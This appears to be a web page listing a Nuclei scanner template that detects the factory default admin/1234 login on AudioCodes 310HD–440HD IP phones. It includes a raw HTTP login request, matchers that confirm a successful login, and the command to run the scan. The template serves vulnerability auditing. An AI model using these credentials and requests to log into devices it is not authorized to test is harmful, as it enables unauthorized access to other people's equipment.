Skip to content

AudioCodes 310HD, 320HD, 420HD, 430HD & 440HD - Default Login

ID: audiocodes-default-login

Severity: high

Author: d4vy

Tags: iot,audiocodes,default-login

AudioCodes devices 310HD, 320HD, 420HD, 430HD & 440HD contain a default login vulnerability. Default login credentials were discovered. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

id: audiocodes-default-login
info:
name: AudioCodes 310HD, 320HD, 420HD, 430HD & 440HD - Default Login
author: d4vy
severity: high
description: AudioCodes devices 310HD, 320HD, 420HD, 430HD & 440HD contain a default login vulnerability. Default login credentials were discovered. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wiki.freepbx.org/display/FPG/Supported+Devices-Audio+Codes#:~:text=Reset%20to%20Factory%20Defaults,-Press%20the%20Menu&text=Then%2C%20enter%20the%20Admin%20password,is%20%221234%22%20by%20default
classification:
cwe-id: CWE-798
metadata:
max-request: 1
tags: iot,audiocodes,default-login
http:
- raw:
- |
POST /login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&psw={{url_encode(base64("{{password}}"))}}
attack: pitchfork
payloads:
username:
- admin
password:
- "1234"
unsafe: true
matchers-condition: and
matchers:
- type: word
words:
- "redirect('/mainform.cgi?go=mainframe.htm')"
- type: word
part: body
negative: true
words:
- "Login failed. Check username and password"
- type: status
status:
- 200
# digest: 490a0046304402206928787d592dc30f6815ab20fb208dd33316371b8255c81d0546c82db8e6536302204132a29e9290294e64e7c5545e6f33a3cb401f3c057d61c59848dbec7e4a5418:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/audiocodes/audiocodes-default-login.yaml"

View on Github